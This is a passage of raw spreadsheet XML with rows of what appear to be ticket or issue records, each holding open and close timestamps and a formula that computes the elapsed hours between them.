      <c r="F2039" s="1">
        <v>43178.761655092596</v>
      </c>
      <c r="G2039" t="s">
        <v>174</v>
      </c>
      <c r="H2039" t="str">
        <f>TEXT(F2039-E2039,"[h]")</f>
        <v>10</v>
      </c>
    </row>
    <row r="2040" spans="1:8">
      <c r="A2040" t="s">
        <v>387</v>
      </c>
      <c r="B2040">
        <v>10765</v>
      </c>
      <c r="C2040" t="s">
        <v>388</v>
      </c>
      <c r="D2040" t="s">
        <v>7</v>
      </c>
      <c r="E2040" s="1">
        <v>43178.287847222222</v>
      </c>
      <c r="F2040" s="1">
        <v>43596.725393518522</v>
      </c>
      <c r="G2040" t="s">
        <v>389</v>
      </c>
      <c r="H2040" t="str">
        <f>TEXT(F2040-E2040,"[h]")</f>
        <v>10042</v>
      </c>
    </row>
    <row r="2041" spans="1:8">
      <c r="A2041" t="s">
        <v>390</v>
      </c>
      <c r="B2041">
        <v>10764</v>
      </c>
      <c r="C2041" t="s">
        <v>391</v>
      </c>
      <c r="D2041" t="s">
        <v>7</v>
      </c>
      <c r="E2041" s="1">
        <v>43177.741909722223</v>
      </c>
      <c r="F2041" s="1">
        <v>43446.31386574074</v>
      </c>
      <c r="G2041" t="s">
        <v>392</v>
      </c>
      <c r="H2041" t="str">
        <f>TEXT(F2041-E2041,"[h]")</f>
        <v>6445</v>
      </c>
    </row>
    <row r="2042" spans="1:8">
      <c r="A2042" t="s">
        <v>393</v>
      </c>
      <c r="B2042">
        <v>10763</v>
      </c>
      <c r="C2042" t="s">
        <v>394</v>
      </c>
      <c r="D2042" t="s">
        <v>7</v>
      </c>
      <c r="E2042" s="1">
        <v>43176.991944444446</v>
      </c>
      <c r="F2042" s="1">
        <v>43195.838773148149</v>
      </c>
      <c r="G2042" t="s">
        <v>16</v>
      </c>
      <c r="H2042" t="str">
        <f>TEXT(F2042-E2042,"[h]")</f>
        <v>452</v>
      </c>
    </row>
    <row r="2043" spans="1:8" hidden="1">
      <c r="A2043" t="s">
        <v>395</v>
      </c>
      <c r="B2043">
        <v>10761</v>
      </c>
      <c r="C2043" t="s">
        <v>396</v>
      </c>
      <c r="D2043" t="s">
        <v>7</v>
      </c>
      <c r="E2043" s="1">
        <v>43176.124942129631</v>
      </c>
      <c r="F2043" s="1">
        <v>43730.060590277775</v>
      </c>
      <c r="G2043" t="s">
        <v>37</v>
      </c>
      <c r="H2043" t="str">
        <f>TEXT(F2043-E2043,"[h]")</f>
        <v>13294</v>
      </c>
    </row>
    <row r="2044" spans="1:8" hidden="1">
      <c r="A2044" t="s">
        <v>397</v>
      </c>
      <c r="B2044">
        <v>10760</v>
      </c>
      <c r="C2044" t="s">
        <v>398</v>
      </c>
      <c r="D2044" t="s">
        <v>7</v>
      </c>
      <c r="E2044" s="1">
        <v>43175.947152777779</v>
      </c>
      <c r="F2044" s="1">
        <v>43216.509293981479</v>
      </c>
      <c r="G2044" t="s">
        <v>251</v>
      </c>
      <c r="H2044" t="str">
        <f>TEXT(F2044-E2044,"[h]")</f>
        <v>973</v>
      </c>
    </row>
    <row r="2045" spans="1:8" hidden="1">
      <c r="A2045" t="s">
        <v>399</v>
      </c>
      <c r="B2045">
        <v>10759</v>
      </c>
      <c r="C2045" t="s">
        <v>400</v>
      </c>
      <c r="D2045" t="s">
        <v>7</v>
      </c>
      <c r="E2045" s="1">
        <v>43175.754270833335</v>
      </c>
      <c r="F2045" s="1">
        <v>43177.657187500001</v>
      </c>
      <c r="G2045" t="s">
        <v>43</v>
      </c>
      <c r="H2045" t="str">
        <f>TEXT(F2045-E2045,"[h]")</f>
        <v>45</v>
      </c>
    </row>
    <row r="2046" spans="1:8" hidden="1">
      <c r="A2046" t="s">
        <v>401</v>
      </c>
      <c r="B2046">
        <v>10758</v>
      </c>
      <c r="C2046" t="s">
        <v>402</v>
      </c>
      <c r="D2046" t="s">
        <v>7</v>
      </c>
      <c r="E2046" s="1">
        <v>43175.737314814818</v>
      </c>
      <c r="F2046" s="1">
        <v>43176.979826388888</v>
      </c>
      <c r="G2046" t="s">
        <v>55</v>
      </c>
      <c r="H2046" t="str">
        <f>TEXT(F2046-E2046,"[h]")</f>
        <v>29</v>
      </c>
    </row>
    <row r="2047" spans="1:8" hidden="1">
      <c r="A2047" t="s">
        <v>403</v>
      </c>
      <c r="B2047">
        <v>10756</v>
      </c>
      <c r="C2047" t="s">
        <v>404</v>
      </c>
      <c r="D2047" t="s">
        <v>7</v>
      </c>
      <c r="E2047" s="1">
        <v>43175.576655092591</v>
      </c>
      <c r="F2047" s="1">
        <v>43215.070775462962</v>
      </c>
      <c r="G2047" t="s">
        <v>204</v>
      </c>
      <c r="H2047" t="str">
        <f>TEXT(F2047-E2047,"[h]")</f>
        <v>947</v>
      </c>
    </row>
    <row r="2048" spans="1:8" hidden="1">
      <c r="A2048" t="s">
        <v>405</v>
      </c>
      <c r="B2048">
        <v>10755</v>
      </c>
      <c r="C2048" t="s">
        <v>406</v>
      </c>
      <c r="D2048" t="s">
        <v>7</v>
      </c>
      <c r="E2048" s="1">
        <v>43175.326458333337</v>
      </c>
      <c r="F2048" s="1">
        <v>43175.760127314818</v>
      </c>
      <c r="G2048" t="s">
        <v>75</v>
      </c>
      <c r="H2048" t="str">
        <f>TEXT(F2048-E2048,"[h]")</f>
        <v>10</v>
      </c>
    </row>
    <row r="2049" spans="1:8" hidden="1">
      <c r="A2049" t="s">
        <v>407</v>
      </c>
      <c r="B2049">
        <v>10752</v>
      </c>
      <c r="C2049" t="s">
        <v>408</v>
      </c>
      <c r="D2049" t="s">
        <v>7</v>
      </c>
      <c r="E2049" s="1">
        <v>43174.712743055556</v>
      </c>
      <c r="F2049" s="1">
        <v>43215.67255787037</v>
      </c>
      <c r="G2049" t="s">
        <v>409</v>
      </c>
      <c r="H2049" t="str">
        <f>TEXT(F2049-E2049,"[h]")</f>
        <v>983</v>
      </c>
    </row>
    <row r="2050" spans="1:8" hidden="1">
      <c r="A2050" t="s">
        <v>410</v>
      </c>
      <c r="B2050">
        <v>10751</v>
      </c>
      <c r="C2050" t="s">
        <v>411</v>
      </c>
      <c r="D2050" t="s">
        <v>7</v>
      </c>
      <c r="E2050" s="1">
        <v>43174.67460648148</v>
      </c>
      <c r="F2050" s="1">
        <v>43182.856111111112</v>
      </c>
      <c r="G2050" t="s">
        <v>412</v>
      </c>
      <c r="H2050" t="str">
        <f>TEXT(F2050-E2050,"[h]")</f>
        <v>196</v>
      </c>
    </row>
    <row r="2051" spans="1:8" hidden="1">
      <c r="A2051" t="s">
        <v>413</v>
      </c>
      <c r="B2051">
        <v>10750</v>
      </c>
      <c r="C2051" t="s">
        <v>414</v>
      </c>
      <c r="D2051" t="s">
        <v>7</v>
      </c>
      <c r="E2051" s="1">
        <v>43174.653854166667</v>
      </c>
      <c r="F2051" s="1">
        <v>43174.889849537038</v>
      </c>
      <c r="G2051" t="s">
        <v>75</v>
      </c>
      <c r="H2051" t="str">
        <f>TEXT(F2051-E2051,"[h]")</f>
        <v>5</v>
      </c>
    </row>
    <row r="2052" spans="1:8" hidden="1">
      <c r="A2052" t="s">
        <v>415</v>
      </c>
      <c r="B2052">
        <v>10748</v>
      </c>
      <c r="C2052" t="s">
        <v>416</v>
      </c>
      <c r="D2052" t="s">
        <v>7</v>
      </c>
      <c r="E2052" s="1">
        <v>43174.50335648148</v>
      </c>
      <c r="F2052" s="1">
        <v>43174.655347222222</v>
      </c>
      <c r="G2052" t="s">
        <v>368</v>
      </c>
      <c r="H2052" t="str">
        <f>TEXT(F2052-E2052,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="2053" spans="1:8" hidden="1">
      <c r="A2053" t="s">
        <v>417</v>
      </c>
      <c r="B2053">
        <v>10746</v>
      </c>
      <c r="C2053" t="s">
        <v>418</v>
      </c>
      <c r="D2053" t="s">
        <v>7</v>
      </c>
      <c r="E2053" s="1">
        <v>43174.148229166669</v>
      </c>
      <c r="F2053" s="1">
        <v>43174.658368055556</v>
      </c>
      <c r="G2053" t="s">
        <v>28</v>
      </c>
      <c r="H2053" t="str">
        <f>TEXT(F2053-E2053,"[h]")</f>
        <v>12</v>
      </c>
    </row>
    <row r="2054" spans="1:8" hidden="1">
      <c r="A2054" t="s">
        <v>419</v>
      </c>
      <c r="B2054">
        <v>10745</v>
      </c>
      <c r="C2054" t="s">
        <v>420</v>
      </c>
      <c r="D2054" t="s">
        <v>7</v>
      </c>
      <c r="E2054" s="1">
        <v>43174.077928240738</v>
      </c>
      <c r="F2054" s="1">
        <v>43201.627870370372</v>
      </c>
      <c r="G2054" t="s">
        <v>37</v>
      </c>
      <c r="H2054" t="str">
        <f>TEXT(F2054-E2054,"[h]")</f>
        <v>661</v>
      </c>
    </row>
    <row r="2055" spans="1:8" hidden="1">
      <c r="A2055" t="s">
        <v>421</v>
      </c>
      <c r="B2055">
        <v>10743</v>
      </c>
      <c r="C2055" t="s">
        <v>422</v>
      </c>
      <c r="D2055" t="s">
        <v>7</v>
      </c>
      <c r="E2055" s="1">
        <v>43173.845868055556</v>
      </c>
      <c r="F2055" s="1">
        <v>43174.047222222223</v>
      </c>
      <c r="G2055" t="s">
        <v>95</v>
      </c>
      <c r="H2055" t="str">
        <f>TEXT(F2055-E2055,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="2056" spans="1:8">
      <c r="A2056" t="s">
        <v>423</v>
      </c>
      <c r="B2056">
        <v>10742</v>
      </c>
      <c r="C2056" t="s">
        <v>424</v>
      </c>
      <c r="D2056" t="s">
        <v>7</v>
      </c>
      <c r="E2056" s="1">
        <v>43173.695925925924</v>
      </c>
      <c r="F2056" s="1">
        <v>43418.945057870369</v>
      </c>
      <c r="G2056" t="s">
        <v>25</v>
      </c>
      <c r="H2056" t="str">
        <f>TEXT(F2056-E2056,"[h]")</f>
        <v>5885</v>
      </c>
    </row>
    <row r="2057" spans="1:8" hidden="1">
      <c r="A2057" t="s">
        <v>425</v>
      </c>
      <c r="B2057">
        <v>10741</v>
      </c>
      <c r="C2057" t="s">
        <v>426</v>
      </c>
      <c r="D2057" t="s">
        <v>7</v>
      </c>
      <c r="E2057" s="1">
        <v>43173.652743055558</v>
      </c>
      <c r="F2057" s="1">
        <v>43574.074907407405</v>
      </c>
      <c r="G2057" t="s">
        <v>427</v>
      </c>
      <c r="H2057" t="str">
        <f>TEXT(F2057-E2057,"[h]")</f>
        <v>9610</v>
      </c>
    </row>
    <row r="2058" spans="1:8" hidden="1">
      <c r="A2058" t="s">
        <v>428</v>
      </c>
      <c r="B2058">
        <v>10740</v>
      </c>
      <c r="C2058" t="s">
        <v>429</v>
      </c>
      <c r="D2058" t="s">
        <v>7</v>
      </c>
      <c r="E2058" s="1">
        <v>43172.876550925925</v>
      </c>
      <c r="F2058" s="1">
        <v>43178.743483796294</v>
      </c>
      <c r="G2058" t="s">
        <v>95</v>
      </c>
      <c r="H2058" t="str">
        <f>TEXT(F2058-E2058,"[h]")</f>
        <v>140</v>
      </c>
    </row>
    <row r="2059" spans="1:8">
      <c r="A2059" t="s">
        <v>430</v>
      </c>
      <c r="B2059">
        <v>10739</v>
      </c>
      <c r="C2059" t="s">
        <v>431</v>
      </c>
      <c r="D2059" t="s">
        <v>7</v>
      </c>
      <c r="E2059" s="1">
        <v>43172.549583333333</v>
      </c>
      <c r="F2059" s="1">
        <v>43200.205555555556</v>
      </c>
      <c r="G2059" t="s">
        <v>31</v>
      </c>
      <c r="H2059" t="str">
        <f>TEXT(F2059-E2059,"[h]")</f>
        <v>663</v>
      </c>
    </row>
    <row r="2060" spans="1:8" hidden="1">
      <c r="A2060" t="s">
        <v>432</v>
      </c>
      <c r="B2060">
        <v>10737</v>
      </c>
      <c r="C2060" t="s">
        <v>433</v>
      </c>
      <c r="D2060" t="s">
        <v>7</v>
      </c>
      <c r="E2060" s="1">
        <v>43171.867696759262</v>
      </c>
      <c r="F2060" s="1">
        <v>43171.949456018519</v>
      </c>
      <c r="G2060" t="s">
        <v>434</v>
      </c>
      <c r="H2060" t="str">
        <f>TEXT(F2060-E2060,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="2061" spans="1:8">
      <c r="A2061" t="s">
        <v>435</v>
      </c>
      <c r="B2061">
        <v>10735</v>
      </c>
      <c r="C2061" t="s">
        <v>436</v>
      </c>
      <c r="D2061" t="s">
        <v>7</v>
      </c>
      <c r="E2061" s="1">
        <v>43171.817835648151</v>
      </c>
      <c r="F2061" s="1">
        <v>43695.652442129627</v>
      </c>
      <c r="G2061" t="s">
        <v>129</v>
      </c>
      <c r="H2061" t="str">
        <f>TEXT(F2061-E2061,"[h]")</f>
        <v>12572</v>
      </c>
    </row>
    <row r="2062" spans="1:8" hidden="1">
      <c r="A2062" t="s">
        <v>437</v>
      </c>
      <c r="B2062">
        <v>10734</v>
      </c>
      <c r="C2062" t="s">
        <v>438</v>
      </c>
      <c r="D2062" t="s">
        <v>7</v>
      </c>
      <c r="E2062" s="1">
        <v>43171.788993055554</v>
      </c>
      <c r="F2062" s="1">
        <v>43172.697696759256</v>
      </c>
      <c r="G2062" t="s">
        <v>51</v>
      </c>
      <c r="H2062" t="str">
        <f>TEXT(F2062-E2062,"[h]")</f>
        <v>21</v>
      </c>
    </row>
    <row r="2063" spans="1:8">
      <c r="A2063" t="s">
        <v>439</v>
      </c>
      <c r="B2063">
        <v>10732</v>
      </c>
      <c r="C2063" t="s">
        <v>440</v>
      </c>
      <c r="D2063" t="s">
        <v>7</v>
      </c>
      <c r="E2063" s="1">
        <v>43171.354895833334</v>
      </c>
      <c r="F2063" s="1">
        <v>43172.69871527778</v>
      </c>
      <c r="G2063" t="s">
        <v>160</v>
      </c>
      <c r="H2063" t="str">
        <f>TEXT(F2063-E2063,"[h]")</f>
        <v>32</v>
      </c>
    </row>
    <row r="2064" spans="1:8">
      <c r="A2064" t="s">
        <v>441</v>
      </c>
      <c r="B2064">
        <v>10731</v>
      </c>
      <c r="C2064" t="s">
        <v>442</v>
      </c>
      <c r="D2064" t="s">
        <v>7</v>
      </c>
      <c r="E2064" s="1">
        <v>43170.878981481481</v>
      </c>
      <c r="F2064" s="1">
        <v>43170.88212962963</v>
      </c>
      <c r="G2064" t="s">
        <v>98</v>
      </c>
      <c r="H2064" t="str">
        <f>TEXT(F2064-E2064,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="2065" spans="1:8" hidden="1">
      <c r="A2065" t="s">
        <v>443</v>
      </c>
      <c r="B2065">
        <v>10730</v>
      </c>
      <c r="C2065" t="s">
        <v>444</v>
      </c>
      <c r="D2065" t="s">
        <v>7</v>
      </c>
      <c r="E2065" s="1">
        <v>43170.835775462961</v>
      </c>
      <c r="F2065" s="1">
        <v>43170.90960648148</v>
      </c>
      <c r="G2065" t="s">
        <v>445</v>
      </c>
      <c r="H2065" t="str">
        <f>TEXT(F2065-E2065,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="2066" spans="1:8" hidden="1">
      <c r="A2066" t="s">
        <v>446</v>
      </c>
      <c r="B2066">
        <v>10729</v>
      </c>
      <c r="C2066" t="s">
        <v>447</v>
      </c>
      <c r="D2066" t="s">
        <v>7</v>
      </c>
      <c r="E2066" s="1">
        <v>43170.829097222224</v>
      </c>
      <c r="F2066" s="1">
        <v>43171.659039351849</v>
      </c>
      <c r="G2066" t="s">
        <v>51</v>
      </c>
      <c r="H2066" t="str">
        <f>TEXT(F2066-E2066,"[h]")</f>
        <v>19</v>
      </c>
    </row>
    <row r="2067" spans="1:8" hidden="1">
      <c r="A2067" t="s">
        <v>448</v>
      </c>
      <c r="B2067">
        <v>10728</v>
      </c>
      <c r="C2067" t="s">
        <v>449</v>
      </c>
      <c r="D2067" t="s">
        <v>7</v>
      </c>
      <c r="E2067" s="1">
        <v>43170.705891203703</v>
      </c>
      <c r="F2067" s="1">
        <v>43368.680162037039</v>
      </c>
      <c r="G2067" t="s">
        <v>450</v>
      </c>
      <c r="H2067" t="str">
        <f>TEXT(F2067-E2067,"[h]")</f>
        <v>4751</v>
      </c>
    </row>
    <row r="2068" spans="1:8">
      <c r="A2068" t="s">
        <v>454</v>
      </c>
      <c r="B2068">
        <v>10726</v>
      </c>
      <c r="C2068" t="s">
        <v>455</v>
      </c>
      <c r="D2068" t="s">
        <v>7</v>
      </c>
      <c r="E2068" s="1">
        <v>43170.654224537036</v>
      </c>
      <c r="F2068" s="1">
        <v>43170.707696759258</v>
      </c>
      <c r="G2068" t="s">
        <v>456</v>
      </c>
      <c r="H2068" t="str">
        <f>TEXT(F2068-E2068,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="2069" spans="1:8" hidden="1">
      <c r="A2069" t="s">
        <v>459</v>
      </c>
      <c r="B2069">
        <v>10724</v>
      </c>
      <c r="C2069" t="s">
        <v>460</v>
      </c>
      <c r="D2069" t="s">
        <v>7</v>
      </c>
      <c r="E2069" s="1">
        <v>43170.632407407407</v>
      </c>
      <c r="F2069" s="1">
        <v>43181.6875462963</v>
      </c>
      <c r="G2069" t="s">
        <v>461</v>
      </c>
      <c r="H2069" t="str">
        <f>TEXT(F2069-E2069,"[h]")</f>
        <v>265</v>
      </c>
    </row>
    <row r="2070" spans="1:8">
      <c r="A2070" t="s">
        <v>462</v>
      </c>
      <c r="B2070">
        <v>10723</v>
      </c>
      <c r="C2070" t="s">
        <v>463</v>
      </c>
      <c r="D2070" t="s">
        <v>7</v>
      </c>
      <c r="E2070" s="1">
        <v>43170.595335648148</v>
      </c>
      <c r="F2070" s="1">
        <v>43596.784166666665</v>
      </c>
      <c r="G2070" t="s">
        <v>16</v>
      </c>
      <c r="H2070" t="str">
        <f>TEXT(F2070-E2070,"[h]")</f>
        <v>10228</v>
      </c>
    </row>
    <row r="2071" spans="1:8" hidden="1">
      <c r="A2071" t="s">
        <v>464</v>
      </c>
      <c r="B2071">
        <v>10722</v>
      </c>
      <c r="C2071" t="s">
        <v>465</v>
      </c>
      <c r="D2071" t="s">
        <v>7</v>
      </c>
      <c r="E2071" s="1">
        <v>43170.099189814813</v>
      </c>
      <c r="F2071" s="1">
        <v>43170.11440972222</v>
      </c>
      <c r="G2071" t="s">
        <v>466</v>
      </c>
      <c r="H2071" t="str">
        <f>TEXT(F2071-E2071,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="2072" spans="1:8">
      <c r="B2072">
        <v>10720</v>
      </c>
      <c r="C2072" t="s">
        <v>467</v>
      </c>
      <c r="D2072" t="s">
        <v>7</v>
      </c>
      <c r="E2072" s="1">
        <v>43169.86645833333</v>
      </c>
      <c r="F2072" s="1">
        <v>43170.055034722223</v>
      </c>
      <c r="G2072" t="s">
        <v>126</v>
      </c>
      <c r="H2072" t="str">
        <f>TEXT(F2072-E2072,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="2073" spans="1:8" hidden="1">
      <c r="B2073">
        <v>10719</v>
      </c>
      <c r="C2073" t="s">
        <v>468</v>
      </c>
      <c r="D2073" t="s">
        <v>7</v>
      </c>
      <c r="E2073" s="1">
        <v>43169.813055555554</v>
      </c>
      <c r="F2073" s="1">
        <v>43169.856585648151</v>
      </c>
      <c r="G2073" t="s">
        <v>469</v>
      </c>
      <c r="H2073" t="str">
        <f>TEXT(F2073-E2073,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="2074" spans="1:8">
      <c r="A2074" t="s">
        <v>470</v>
      </c>
      <c r="B2074">
        <v>10718</v>
      </c>
      <c r="C2074" t="s">
        <v>471</v>
      </c>
      <c r="D2074" t="s">
        <v>7</v>
      </c>
      <c r="E2074" s="1">
        <v>43169.012974537036</v>
      </c>
      <c r="F2074" s="1">
        <v>43172.767939814818</v>
      </c>
      <c r="G2074" t="s">
        <v>314</v>
      </c>
      <c r="H2074" t="str">
        <f>TEXT(F2074-E2074,"[h]")</f>
        <v>90</v>
      </c>
    </row>
    <row r="2075" spans="1:8">
      <c r="A2075" t="s">
        <v>457</v>
      </c>
      <c r="B2075">
        <v>10716</v>
      </c>
      <c r="C2075" t="s">
        <v>458</v>
      </c>
      <c r="D2075" t="s">
        <v>7</v>
      </c>
      <c r="E2075" s="1">
        <v>43168.837812500002</v>
      </c>
      <c r="F2075" s="1">
        <v>43170.056041666663</v>
      </c>
      <c r="G2075" t="s">
        <v>16</v>
      </c>
      <c r="H2075" t="str">
        <f>TEXT(F2075-E2075,"[h]")</f>
        <v>29</v>
      </c>
    </row>
    <row r="2076" spans="1:8" hidden="1">
      <c r="A2076" t="s">
        <v>472</v>
      </c>
      <c r="B2076">
        <v>10715</v>
      </c>
      <c r="C2076" t="s">
        <v>473</v>
      </c>
      <c r="D2076" t="s">
        <v>7</v>
      </c>
      <c r="E2076" s="1">
        <v>43168.792905092596</v>
      </c>
      <c r="F2076" s="1">
        <v>43169.759479166663</v>
      </c>
      <c r="G2076" t="s">
        <v>474</v>
      </c>
      <c r="H2076" t="str">
        <f>TEXT(F2076-E2076,"[h]")</f>
        <v>23</v>
      </c>
    </row>
    <row r="2077" spans="1:8">
      <c r="A2077" t="s">
        <v>475</v>
      </c>
      <c r="B2077">
        <v>10712</v>
      </c>
      <c r="C2077" t="s">
        <v>476</v>
      </c>
      <c r="D2077" t="s">
        <v>7</v>
      </c>
      <c r="E2077" s="1">
        <v>43168.252534722225</v>
      </c>
      <c r="F2077" s="1">
        <v>43170.055381944447</v>
      </c>
      <c r="G2077" t="s">
        <v>126</v>
      </c>
      <c r="H2077" t="str">
        <f>TEXT(F2077-E2077,"[h]")</f>
        <v>43</v>
      </c>
    </row>
    <row r="2078" spans="1:8" hidden="1">
      <c r="A2078" t="s">
        <v>477</v>
      </c>
      <c r="B2078">
        <v>10711</v>
      </c>
      <c r="C2078" t="s">
        <v>478</v>
      </c>
      <c r="D2078" t="s">
        <v>7</v>
      </c>
      <c r="E2078" s="1">
        <v>43167.863125000003</v>
      </c>
      <c r="F2078" s="1">
        <v>43167.981041666666</v>
      </c>
      <c r="G2078" t="s">
        <v>174</v>
      </c>
      <c r="H2078" t="str">
        <f>TEXT(F2078-E2078,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="2079" spans="1:8">
      <c r="A2079" t="s">
        <v>479</v>
      </c>
      <c r="B2079">
        <v>10710</v>
      </c>
      <c r="C2079" t="s">
        <v>480</v>
      </c>
      <c r="D2079" t="s">
        <v>7</v>
      </c>
      <c r="E2079" s="1">
        <v>43167.757604166669</v>
      </c>
      <c r="F2079" s="1">
        <v>43167.805150462962</v>
      </c>
      <c r="G2079" t="s">
        <v>31</v>
      </c>
      <c r="H2079" t="str">
        <f>TEXT(F2079-E2079,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="2080" spans="1:8">
      <c r="A2080" t="s">
        <v>481</v>
      </c>
      <c r="B2080">
        <v>10708</v>
      </c>
      <c r="C2080" t="s">
        <v>482</v>
      </c>
      <c r="D2080" t="s">
        <v>7</v>
      </c>
      <c r="E2080" s="1">
        <v>43167.697002314817</v>
      </c>
      <c r="F2080" s="1">
        <v>43167.835787037038</v>
      </c>
      <c r="G2080" t="s">
        <v>483</v>
      </c>
      <c r="H2080" t="str">
        <f>TEXT(F2080-E2080,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="2081" spans="1:8" hidden="1">
      <c r="A2081" t="s">
        <v>484</v>
      </c>
      <c r="B2081">
        <v>10707</v>
      </c>
      <c r="C2081" t="s">
        <v>485</v>
      </c>
      <c r="D2081" t="s">
        <v>7</v>
      </c>
      <c r="E2081" s="1">
        <v>43167.44935185185</v>
      </c>
      <c r="F2081" s="1">
        <v>43320.011192129627</v>
      </c>
      <c r="G2081" t="s">
        <v>118</v>
      </c>
      <c r="H2081" t="str">
        <f>TEXT(F2081-E2081,"[h]")</f>
        <v>3661</v>
      </c>
    </row>
    <row r="2082" spans="1:8" hidden="1">
      <c r="B2082">
        <v>10706</v>
      </c>
      <c r="C2082" t="s">
        <v>486</v>
      </c>
      <c r="D2082" t="s">
        <v>7</v>
      </c>
      <c r="E2082" s="1">
        <v>43167.389502314814</v>
      </c>
      <c r="F2082" s="1">
        <v>43388.234293981484</v>
      </c>
      <c r="G2082" t="s">
        <v>373</v>
      </c>
      <c r="H2082" t="str">
        <f>TEXT(F2082-E2082,"[h]")</f>
        <v>5300</v>
      </c>
    </row>
    <row r="2083" spans="1:8" hidden="1">
      <c r="A2083" t="s">
        <v>487</v>
      </c>
      <c r="B2083">
        <v>10704</v>
      </c>
      <c r="C2083" t="s">
        <v>488</v>
      </c>
      <c r="D2083" t="s">
        <v>7</v>
      </c>
      <c r="E2083" s="1">
        <v>43167.348680555559</v>
      </c>
      <c r="F2083" s="1">
        <v>43280.914131944446</v>
      </c>
      <c r="G2083" t="s">
        <v>373</v>
      </c>
      <c r="H2083" t="str">
        <f>TEXT(F2083-E2083,"[h]")</f>
        <v>2725</v>
      </c>
    </row>
    <row r="2084" spans="1:8" hidden="1">
      <c r="A2084" t="s">
        <v>489</v>
      </c>
      <c r="B2084">
        <v>10703</v>
      </c>
      <c r="C2084" t="s">
        <v>490</v>
      </c>
      <c r="D2084" t="s">
        <v>7</v>
      </c>
      <c r="E2084" s="1">
        <v>43167.334293981483</v>
      </c>
      <c r="F2084" s="1">
        <v>43167.764733796299</v>
      </c>
      <c r="G2084" t="s">
        <v>491</v>
      </c>
      <c r="H2084" t="str">
        <f>TEXT(F2084-E2084,"[h]")</f>
        <v>10</v>
      </c>
    </row>
    <row r="2085" spans="1:8" hidden="1">
      <c r="A2085" t="s">
        <v>492</v>
      </c>
      <c r="B2085">
        <v>10702</v>
      </c>
      <c r="C2085" t="s">
        <v>493</v>
      </c>
      <c r="D2085" t="s">
        <v>7</v>
      </c>
      <c r="E2085" s="1">
        <v>43167.304016203707</v>
      </c>
      <c r="F2085" s="1">
        <v>43175.652268518519</v>
      </c>
      <c r="G2085" t="s">
        <v>55</v>
      </c>
      <c r="H2085" t="str">
        <f>TEXT(F2085-E2085,"[h]")</f>
        <v>200</v>
      </c>
    </row>
    <row r="2086" spans="1:8" hidden="1">
      <c r="A2086" t="s">
        <v>494</v>
      </c>
      <c r="B2086">
        <v>10699</v>
      </c>
      <c r="C2086" t="s">
        <v>495</v>
      </c>
      <c r="D2086" t="s">
        <v>7</v>
      </c>
      <c r="E2086" s="1">
        <v>43166.078472222223</v>
      </c>
      <c r="F2086" s="1">
        <v>43166.117604166669</v>
      </c>
      <c r="G2086" t="s">
        <v>255</v>
      </c>
      <c r="H2086" t="str">
        <f>TEXT(F2086-E2086,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="2087" spans="1:8">
      <c r="A2087" t="s">
        <v>496</v>
      </c>
      <c r="B2087">
        <v>10698</v>
      </c>
      <c r="C2087" t="s">
        <v>497</v>
      </c>
      <c r="D2087" t="s">
        <v>7</v>
      </c>
      <c r="E2087" s="1">
        <v>43166.069502314815</v>
      </c>
      <c r="F2087" s="1">
        <v>43167.878993055558</v>
      </c>
      <c r="G2087" t="s">
        <v>16</v>
      </c>
      <c r="H2087" t="str">
        <f>TEXT(F2087-E2087,"[h]")</f>
        <v>43</v>
      </c>
    </row>
    <row r="2088" spans="1:8">
      <c r="A2088" t="s">
        <v>498</v>
      </c>
      <c r="B2088">
        <v>10697</v>
      </c>
      <c r="C2088" t="s">
        <v>499</v>
      </c>
      <c r="D2088" t="s">
        <v>7</v>
      </c>
      <c r="E2088" s="1">
        <v>43165.928599537037</v>
      </c>
      <c r="F2088" s="1">
        <v>43175.74422453704</v>
      </c>
      <c r="G2088" t="s">
        <v>500</v>
      </c>
      <c r="H2088" t="str">
        <f>TEXT(F2088-E2088,"[h]")</f>
        <v>235</v>
      </c>
    </row>
    <row r="2089" spans="1:8" hidden="1">
      <c r="A2089" t="s">
        <v>501</v>
      </c>
      <c r="B2089">
        <v>10696</v>
      </c>
      <c r="C2089" t="s">
        <v>502</v>
      </c>
      <c r="D2089" t="s">
        <v>7</v>
      </c>
      <c r="E2089" s="1">
        <v>43165.38422453704</v>
      </c>
      <c r="F2089" s="1">
        <v>43165.776435185187</v>
      </c>
      <c r="G2089" t="s">
        <v>503</v>
      </c>
      <c r="H2089" t="str">
        <f>TEXT(F2089-E2089,"[h]")</f>
        <v>9</v>
      </c>
    </row>
    <row r="2090" spans="1:8" hidden="1">
      <c r="A2090" t="s">
        <v>504</v>
      </c>
      <c r="B2090">
        <v>10694</v>
      </c>
      <c r="C2090" t="s">
        <v>505</v>
      </c>
      <c r="D2090" t="s">
        <v>7</v>
      </c>
      <c r="E2090" s="1">
        <v>43164.776284722226</v>
      </c>
      <c r="F2090" s="1">
        <v>43167.823912037034</v>
      </c>
      <c r="G2090" t="s">
        <v>368</v>
      </c>
      <c r="H2090" t="str">
        <f>TEXT(F2090-E2090,"[h]")</f>
        <v>73</v>
      </c>
    </row>
    <row r="2091" spans="1:8" hidden="1">
      <c r="A2091" t="s">
        <v>506</v>
      </c>
      <c r="B2091">
        <v>10691</v>
      </c>
      <c r="C2091" t="s">
        <v>507</v>
      </c>
      <c r="D2091" t="s">
        <v>7</v>
      </c>
      <c r="E2091" s="1">
        <v>43164.011203703703</v>
      </c>
      <c r="F2091" s="1">
        <v>43164.029803240737</v>
      </c>
      <c r="G2091" t="s">
        <v>75</v>
      </c>
      <c r="H2091" t="str">
        <f>TEXT(F2091-E2091,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="2092" spans="1:8" hidden="1">
      <c r="A2092" t="s">
        <v>508</v>
      </c>
      <c r="B2092">
        <v>10689</v>
      </c>
      <c r="C2092" t="s">
        <v>509</v>
      </c>
      <c r="D2092" t="s">
        <v>7</v>
      </c>
      <c r="E2092" s="1">
        <v>43163.332395833335</v>
      </c>
      <c r="F2092" s="1">
